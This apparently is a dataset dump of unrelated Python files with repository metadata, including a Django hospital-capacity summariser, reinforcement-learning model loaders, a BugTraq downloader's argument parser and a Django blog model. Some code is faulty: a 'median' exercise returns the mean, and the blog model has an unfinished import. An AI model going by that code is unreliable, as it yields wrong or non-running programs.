dep_include_paths_str = "waterplus_map_tools;/home/gyc/match_ws/src/tools/waterplus_map_tools/msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg;geometry_msgs;/opt/ros/melodic/share/geometry_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| [
"[email protected]"
]
| |
ab104e594bbf8454e09b791cefc01091331f1e51 | a90077635aeac846965381e0b07591a1df011afe | /care/facility/summarisation/facility_capacity.py | 17669b7b24a61209378ee70cec2dbb3a812a2584 | [
"MIT"
]
| permissive | Basharckr/care | f873ca140ae8607846d9b9500e3c21e9bfa15800 | c86ae2614ea9ba80b140a2eb21ad64fdbb47ad7e | refs/heads/master | 2023-06-17T21:26:48.936321 | 2021-07-12T06:03:52 | 2021-07-12T06:03:52 | 386,884,450 | 1 | 0 | MIT | 2021-07-17T08:41:09 | 2021-07-17T08:41:09 | null | UTF-8 | Python | false | false | 8,112 | py | from celery.decorators import periodic_task
from celery.schedules import crontab
from django.db.models import Sum
from django.utils.decorators import method_decorator
from django.utils.timezone import localtime, now
from django.views.decorators.cache import cache_page
from django_filters import rest_framework as filters
from rest_framework import serializers
from rest_framework.mixins import ListModelMixin
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.viewsets import GenericViewSet
from care.facility.api.serializers.facility import FacilitySerializer
from care.facility.api.serializers.facility_capacity import FacilityCapacitySerializer
from care.facility.models import Facility, FacilityCapacity, FacilityRelatedSummary, PatientRegistration
from care.facility.models.inventory import FacilityInventoryBurnRate, FacilityInventoryLog, FacilityInventorySummary
from care.facility.models.patient import PatientRegistration
class FacilitySummarySerializer(serializers.ModelSerializer):
facility = FacilitySerializer()
class Meta:
model = FacilityRelatedSummary
exclude = (
"id",
"s_type",
)
class FacilitySummaryFilter(filters.FilterSet):
start_date = filters.DateFilter(field_name="created_date", lookup_expr="gte")
end_date = filters.DateFilter(field_name="created_date", lookup_expr="lte")
facility = filters.UUIDFilter(field_name="facility__external_id")
district = filters.NumberFilter(field_name="facility__district__id")
local_body = filters.NumberFilter(field_name="facility__local_body__id")
state = filters.NumberFilter(field_name="facility__state__id")
class FacilityCapacitySummaryViewSet(
ListModelMixin, GenericViewSet,
):
lookup_field = "external_id"
queryset = (
FacilityRelatedSummary.objects.filter(s_type="FacilityCapacity")
.order_by("-created_date")
.select_related("facility", "facility__state", "facility__district", "facility__local_body")
)
permission_classes = (IsAuthenticatedOrReadOnly,)
serializer_class = FacilitySummarySerializer
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = FacilitySummaryFilter
@method_decorator(cache_page(60 * 10))
def dispatch(self, request, *args, **kwargs):
return super().dispatch(request, *args, **kwargs)
# def get_queryset(self):
# user = self.request.user
# queryset = self.queryset
# if user.is_superuser:
# return queryset
# elif self.request.user.user_type >= User.TYPE_VALUE_MAP["DistrictReadOnlyAdmin"]:
# return queryset.filter(facility__district=user.district)
# elif self.request.user.user_type >= User.TYPE_VALUE_MAP["StateReadOnlyAdmin"]:
# return queryset.filter(facility__state=user.state)
# return queryset.filter(facility__users__id__exact=user.id)
def FacilityCapacitySummary():
capacity_objects = FacilityCapacity.objects.all().select_related(
"facility", "facility__state", "facility__district", "facility__local_body"
)
capacity_summary = {}
current_date = localtime(now()).replace(hour=0, minute=0, second=0, microsecond=0)
for facility_obj in Facility.objects.all():
# Calculate Actual Patients Discharged and Live in this Facility
patients_in_facility = PatientRegistration.objects.filter(facility_id=facility_obj.id).select_related(
"state", "district", "local_body"
)
capacity_summary[facility_obj.id] = FacilitySerializer(facility_obj).data
capacity_summary[facility_obj.id]["actual_live_patients"] = patients_in_facility.filter(is_active=True).count()
discharge_patients = patients_in_facility.filter(is_active=False)
capacity_summary[facility_obj.id]["actual_discharged_patients"] = discharge_patients.count()
capacity_summary[facility_obj.id]["availability"] = []
temp_inventory_summary_obj = {}
summary_objs = FacilityInventorySummary.objects.filter(facility_id=facility_obj.id)
for summary_obj in summary_objs:
burn_rate = FacilityInventoryBurnRate.objects.filter(
facility_id=facility_obj.id, item_id=summary_obj.item.id
).first()
log_query = FacilityInventoryLog.objects.filter(
facility_id=facility_obj.id,
item_id=summary_obj.item.id,
created_date__gte=current_date,
probable_accident=False,
)
# start_log = log_query.order_by("created_date").first()
end_log = log_query.order_by("-created_date").first()
# start_stock = summary_obj.quantity_in_default_unit
# if start_log:
# if start_log.is_incoming: # Add current value to current stock to get correct stock
# start_stock = start_log.current_stock + start_log.quantity_in_default_unit
# else:
# start_stock = start_log.current_stock - start_log.quantity_in_default_unit
end_stock = summary_obj.quantity
if end_log:
end_stock = end_log.current_stock
total_consumed = 0
temp1 = log_query.filter(is_incoming=False).aggregate(Sum("quantity_in_default_unit"))
if temp1:
total_consumed = temp1.get("quantity_in_default_unit__sum", 0)
if not total_consumed:
total_consumed = 0
total_added = 0
temp2 = log_query.filter(is_incoming=True).aggregate(Sum("quantity_in_default_unit"))
if temp2:
total_added = temp2.get("quantity_in_default_unit__sum", 0)
if not total_added:
total_added = 0
# Calculate Start Stock as
# end_stock = start_stock - consumption + addition
# start_stock = end_stock - addition + consumption
# This way the start stock will never veer off course
start_stock = end_stock - total_added + total_consumed
if burn_rate:
burn_rate = burn_rate.burn_rate
temp_inventory_summary_obj[summary_obj.item.id] = {
"item_name": summary_obj.item.name,
"stock": summary_obj.quantity,
"unit": summary_obj.item.default_unit.name,
"is_low": summary_obj.is_low,
"burn_rate": burn_rate,
"start_stock": start_stock,
"end_stock": end_stock,
"total_consumed": total_consumed,
"total_added": total_added,
"modified_date": summary_obj.modified_date.astimezone().isoformat(),
}
capacity_summary[facility_obj.id]["inventory"] = temp_inventory_summary_obj
for capacity_object in capacity_objects:
facility_id = capacity_object.facility.id
if facility_id not in capacity_summary:
capacity_summary[facility_id] = FacilitySerializer(capacity_object.facility).data
if "availability" not in capacity_summary[facility_id]:
capacity_summary[facility_id]["availability"] = []
capacity_summary[facility_id]["availability"].append(FacilityCapacitySerializer(capacity_object).data)
for i in capacity_summary:
facility_summary_obj = None
if FacilityRelatedSummary.objects.filter(
s_type="FacilityCapacity", facility_id=i, created_date__gte=current_date
).exists():
facility_summary_obj = FacilityRelatedSummary.objects.get(
s_type="FacilityCapacity", facility_id=i, created_date__gte=current_date
)
else:
facility_summary_obj = FacilityRelatedSummary(s_type="FacilityCapacity", facility_id=i)
facility_summary_obj.data = capacity_summary[i]
facility_summary_obj.save()
return True
@periodic_task(run_every=crontab(minute="*/5"))
def run_midnight():
FacilityCapacitySummary()
print("Summarised Capacities")
| [
"[email protected]"
]
| |
d3d10a4755e4599dfc81f7fea2fea1d344dc0b4b | 82bdb812582e7ad42db922023f3eb84b4fb80f72 | /networks.py | 4a8973311254d1c7786d7381d47672b7ffe20ffd | []
| no_license | hzaskywalker/AWR-Python | cda43594248f3db563456f67c677db4508f80a5c | 4fb00f3691b980c93734b11fab6002737a369b31 | refs/heads/master | 2022-10-11T09:31:37.742771 | 2020-06-11T17:18:10 | 2020-06-11T17:18:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,135 | py | import torch
import numpy as np
class Value:
def __init__(self, policy):
self.policy = policy
def __call__(self, state, params):
state = torch.cat((state, params), dim=-1)
act = self.policy.actor_target(state)
cri1, cri2 = self.policy.critic_target(state,act)
return torch.min(cri1, cri2)
#return min(min (cri1.numpy(), cri2.numpy())[0][0])
def get_td3_value(env_name):
if env_name == "DartWalker2dPT-v1":
state_dim = 25
action_dim = 6
max_action = 1.0
elif env_name == "DartHopperPT-v1":
state_dim = 16
action_dim = 3
max_action = 1.0
import utils
import policy_transfer.uposi.TD3.utils
from policy_transfer.uposi.TD3.TD3 import TD3
import policy_transfer.uposi.TD3.OurDDPG
import policy_transfer.uposi.TD3.DDPG
policy = TD3(state_dim = state_dim, action_dim = action_dim, max_action = max_action)
policy.load("/home/hza/policy_transfer/PT/policy_transfer/uposi/TD3/models/TD3_" + env_name + "_1000")
#policy.actor_target.to(torch.device("cpu"))
#policy.critic_target.to(torch.device("cpu"))
policy.actor_target.to(torch.device("cuda"))
policy.critic_target.to(torch.device("cuda"))
return Value(policy)
class UP:
def __init__(self, actor_critic, ob_rms):
self.actor_critic = actor_critic
self.ob_rms = ob_rms
self.device = 'cuda:0'
self.params = None
def reset(self):
self.hidden = torch.zeros(
1, self.actor_critic.recurrent_hidden_state_size, device=self.device)
self.mask = torch.zeros(1, 1, device=self.device)
def set_params(self, params):
self.params = params
def __call__(self, ob):
assert self.params is not None
ob = np.concatenate((ob, self.params))
ob = torch.tensor([np.clip((ob - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + 1e-08), -10.0, 10.0)], dtype=torch.float32, device=self.device)
_, action, _, self.hidden_state = self.actor_critic.act(ob, self.hidden, self.mask, deterministic=True)
return action.detach().cpu().numpy()[0]
def get_up_network(env_name, num):
import sys
import os
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'PT/policy_transfer/uposi'))
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'PT/baselines'))
from a2c_ppo_acktr import algo, utils
from a2c_ppo_acktr.algo import gail
from a2c_ppo_acktr.arguments import get_args
from a2c_ppo_acktr.envs import make_vec_envs
from a2c_ppo_acktr.model import Policy
from a2c_ppo_acktr.storage import RolloutStorage
env_name = env_name[:-5]
if 'Dart' in env_name:
path = f"/home/hza/policy_transfer/PT/trained_models/ppo/UP_{env_name}_{num}.pt"
else:
path = f"/home/hza/policy_transfer/PT/trained_models/ppo/UP_{env_name}_{num}.pt"
result = torch.load(path, map_location=lambda a, b:torch.Storage().cuda())
actor_critic = result[0]
actor_critic.cuda()
ob_rms = result[1]
return UP(actor_critic, ob_rms)
class UP2(UP):
def __init__(self, agent):
self.agent = agent
self.params = None
def set_params(self, params):
self.params = params
def __call__(self, ob):
if len(self.params.shape) == 1:
ob = np.concatenate((ob, self.params), axis=0)[None,:]
else:
ob = np.concatenate((np.tile(ob,(len(self.params), 1)), self.params), axis=1)
action = self.agent.act(ob, mode='test')
return action.mean(axis=0)
def reset(self):
pass
def get_awr_network(env_name, num):
import torch
import sys
sys.path.append('awr2')
path = f'awr2/models/{env_name}'
agent = torch.load(path)
return UP2(agent)
def get_finetune_network(env_name, num, num_iter=21, num_proc=10):
import torch
import sys
from finetune import Finetune
sys.path.append('awr2')
path = f'awr2/models/{env_name}'
agent = torch.load(path)
return Finetune(env_name, num, agent, num_iter, num_proc=num_proc) | [
"[email protected]"
]
| |
d97fa27fd1ef8dab53b15a077aea13385d7f7afd | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/artificial/transf_Quantization/trend_MovingMedian/cycle_12/ar_/test_artificial_128_Quantization_MovingMedian_12__100.py | 64695ec2235c61ebbe172764ee17c38a3ffdbfd8 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 272 | py | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "MovingMedian", cycle_length = 12, transform = "Quantization", sigma = 0.0, exog_count = 100, ar_order = 0); | [
"[email protected]"
]
| |
b87981a578e9f0a4fa7bd52c97f63d833cf5ea5c | 3d7e1a506d65c23c84b7430fa46623cb98de8c64 | /median.py | dc0584831963d0d6f87700eddb7c8140d94fb9f2 | []
| no_license | crakama/UdacityIntrotoComputerScience | cb6ac8a9084f078eaf245a52adc43541c35dc3f4 | 416b82b85ff70c48eabae6bb9d7b43354a158d9a | refs/heads/master | 2021-01-09T20:39:15.974791 | 2016-07-18T20:59:09 | 2016-07-18T20:59:09 | 60,571,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | # Define a procedure, median, that takes three
# numbers as its inputs, and returns the median
# of the three numbers.
# Make sure your procedure has a return statement.
def bigger(a,b):
if a > b:
return a
else:
return b
def biggest(a,b,c):
return bigger(a,bigger(b,c))
def median(a, b, c):
summation = a + b + c
median = summation / 3
return median
| [
"[email protected]"
]
| |
1ee30cd5b57a8912f7804703d5709be5b9d229d5 | 77ca708f981b3d4127568ff416e3c0a3dc1fff94 | /util/cli_parser.py | be02dbf7e3bb509d0d10d208c7954fafe85a7c4c | [
"Apache-2.0"
]
| permissive | inksong/bidDB_downloader | df7046cadc392872d4ed58bd730474771e83aaf0 | 1550b6006d1d21bab726bbe5a10c8c2d7aa94bbc | refs/heads/master | 2022-03-06T19:10:03.333813 | 2019-09-28T19:41:15 | 2019-09-28T19:41:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,575 | py | import argparse
import sys
class CLIParser:
# -- Public methods
# CLIParser Constructor
def __init__(self):
super(CLIParser, self).__init__()
self.parser = argparse.ArgumentParser(prog='bidDB_downloader.py', description='BugTraq database downloader.')
self.parser.add_argument('-w','--workers', type=int, default=100, help='number of workers for execution. By '
'default, the workers number is set '
'to 100')
self.parser.add_argument('-f', '--first', type=int, default=1, help='your download will start from this '
'BugTraq Id. By default, the first BugTraq '
'Id is set to 1')
self.parser.add_argument('-l', '--last', type=int, default=100000, help='your download will finish in this last'
' BugTraq Id. By default, the last '
'BugTraq Id is set to 100000')
self.parser.add_argument('-v', '--version', action='version', version='%(prog)s 0.1.0',
help='show the version message and exit')
self.args = self.parser.parse_args()
self.__verify_args()
# -- Getters
# Gets workers
def get_workers(self):
return self.args.workers
# Gets the first bid
def get_first_bid(self):
return self.args.first
# Gets the last bid
def get_last_bid(self):
return self.args.last
# -- Private methods
# Verify command line arguments
def __verify_args(self):
if self.args.first <= 0 or self.args.last <= 0 or self.args.workers <= 0:
print(self.parser.prog + ': error: all arguments must be greater than zero.', file=sys.stderr)
exit(2)
elif self.args.first > self.args.last:
print(self.parser.prog + ': error: argument -l/--last: this argument must be greater than -f/--first '
'argument.', file=sys.stderr)
exit(2)
elif self.args.workers > 500:
print(self.parser.prog + ': warning: argument -w/--workers: your system may be unstable with values '
'greater than 500.', file=sys.stderr)
| [
"[email protected]"
]
| |
bd1e701a5e902eca16077631d3424e1691ebb4f5 | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project2/Project2/.history/blog/models_20211115152413.py | 443d1fa03512e592b13bcd760279c43dbb1f7c43 | []
| no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 778 | py | from django.db import models
from django.contrib.auth.models import User
from ckeditor
# Create your models here.
STATUS = ((0, "Draft"), (1, "Published"))
USE_TZ = False
class Blog(models.Model):
title = models.CharField('Tiêu đề', max_length=250, blank=True)
slug = models.SlugField(max_length=250, blank=True)
author = models.ForeignKey(
User, on_delete=models.CASCADE, related_name='blog_posts')
created_on = models.DateTimeField('Giờ tạo',
auto_now_add=True)
update_on = models.DateTimeField('Giờ cập nhật', auto_now=True)
content = models.TextField()
status = models.IntegerField('Trạng thái', choices=STATUS, default=0)
class meta:
ordering = ['-created_on']
def __str__(self):
return self.title
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.